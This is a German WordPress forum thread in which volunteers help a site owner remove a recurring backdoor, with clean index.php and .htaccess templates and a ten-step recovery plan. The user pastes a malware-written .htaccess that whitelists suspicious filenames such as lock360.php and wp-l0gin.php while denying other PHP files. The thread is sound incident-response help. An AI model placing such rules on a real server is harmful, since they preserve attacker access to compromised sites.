Ansicht von 15 Antworten – 31 bis 45 (von insgesamt 46)
  • Da haben wir ja den Übeltäter. Das was mit urldecode() in der zweiten Zeile anfängt ist Malware. Lösch die Datei mal komplett und lad eine neue index.php mit folgendem Inhalt hoch:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define( 'WP_USE_THEMES', true );
    
    /** Loads the WordPress Environment and Template */
    require __DIR__ . '/wp-blog-header.php';
    Thread-Starter mauk21

    (@mauk21)

    probiere ich gleich mal aus, danke vorerst für die Mühe !

    Schau auch mal nach, ob die Datei wp-admin/index.php einen ähnlichen Code hat. Den Dateiinhalt findest du hier: https://core.trac.wordpress.org/browser/trunk/src/wp-admin/_index.php?format=txt

    @pixolin
    Nachdem das Problem gelöst ist, wäre es vielleicht nicht schlecht, wenn du die Malware aus dem Posting entfernst. Man muss so was ja nicht auch noch öffentlich verteilen. 😉

    Ja stimmt. Du kannst den Code zwar mit drei Sekunden Google-Recherche an anderen Stellen im Web finden, aber ich habe ihn jetzt mal ein wenig gekürzt.

    Thread-Starter mauk21

    (@mauk21)

    kurze rückmeldung da ichs jetzt erst geschafft habe, es hat funktioniert! Danke für die Hilfe!👍
    Allerdings wird jetzt das Dashboard nicht richtig angezeigt (ohne Layout, alles untereinander in textform)

    • Diese Antwort wurde geändert vor 2 Jahren, 2 Monaten von mauk21.
    • Diese Antwort wurde geändert vor 2 Jahren, 2 Monaten von mauk21.

    Den Browser-Cache hast du geleert?

    Thread-Starter mauk21

    (@mauk21)

    hab ich geleert, auch im privaten modus dasselbe

    Hast du die .htaccess bereinigt?

    Dort sollte nur noch folgendes stehen:

    # BEGIN WordPress
    # Die Anweisungen (Zeilen) zwischen „BEGIN WordPress“ und „END WordPress“ sind
    # dynamisch generiert und sollten nur über WordPress-Filter geändert werden.
    # Alle Änderungen an den Anweisungen zwischen diesen Markierungen werden überschrieben.
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    Thread-Starter mauk21

    (@mauk21)

    Hab ich gereinigt, ändert sich allerdings immer wieder in den folgenden Code um:

    <FilesMatch ".(py|exe|php)$">
     Order allow,deny
     Deny from all
    </FilesMatch>
    <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
     Order allow,deny
     Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    Dann hast du die Malware noch nicht vollständig beseitigt.

    Thread-Starter mauk21

    (@mauk21)

    Tatsächlich, der urldecode ist wieder in der index.php datei aufgetaucht

    So ist das bei Backdoors … ¯\_(ツ)_/¯

    Thread-Starter mauk21

    (@mauk21)

    wo könnte noch was an malware drin sein ? index.php hatte ich bereinigt sowohl in wp-admin als auch im wordpress ordner

    Wo Malware enthalten sein könnte? Überall. 😀

    Um die Website zu reparieren musst du

    1. das Verzeichnis wp-content/uploads auf einem externen Datenträger sichern und jede einzelne Datei auf mögliche Malware-Skripte prüfen. Andere Dateitypen als Mediendateien sollten hier überhaupt nicht vorkommen.
    2. die wp-config.php auf Datenträger sichern.
    3. eine Liste aller verwendeten Themes und Plugins erstellen.
    4. alle Dateien und Unterverzeichnisse im Web-Stammverzeichnis löschen. Wirklich alle.
    5. WordPress-Core und die vorher notierten Themes und Plugins von wordpress.org herunterladen, entpacken, auf den Server hochladen.
    6. das vorher gesicherte Verzeichnis wp-content/uploads und die wp-config.php wiederherstellen.
    7. in der Datenbanktabelle wp_users nach nicht bekannten Benutzern suchen unud diese löschen.
    8. Zugangsdaten für Webhoster, FTP, MySQL-Datenbank und WordPress-Benutzer-Accounts ändern. (wp-config.php anpassen!)
    9. ggf. zusätzliche Absicherungsmaßnahmen vornehmen.
    10. künftig auf regelmäßige Updates achten und keine Themes/Plugins aus unsicheren Quellen verwenden.

    Arbeitsaufwand mindestens vier Stunden.

Ansicht von 15 Antworten – 31 bis 45 (von insgesamt 46)
  • Das Thema „Access denied. bei wp-admin“ ist für neue Antworten geschlossen.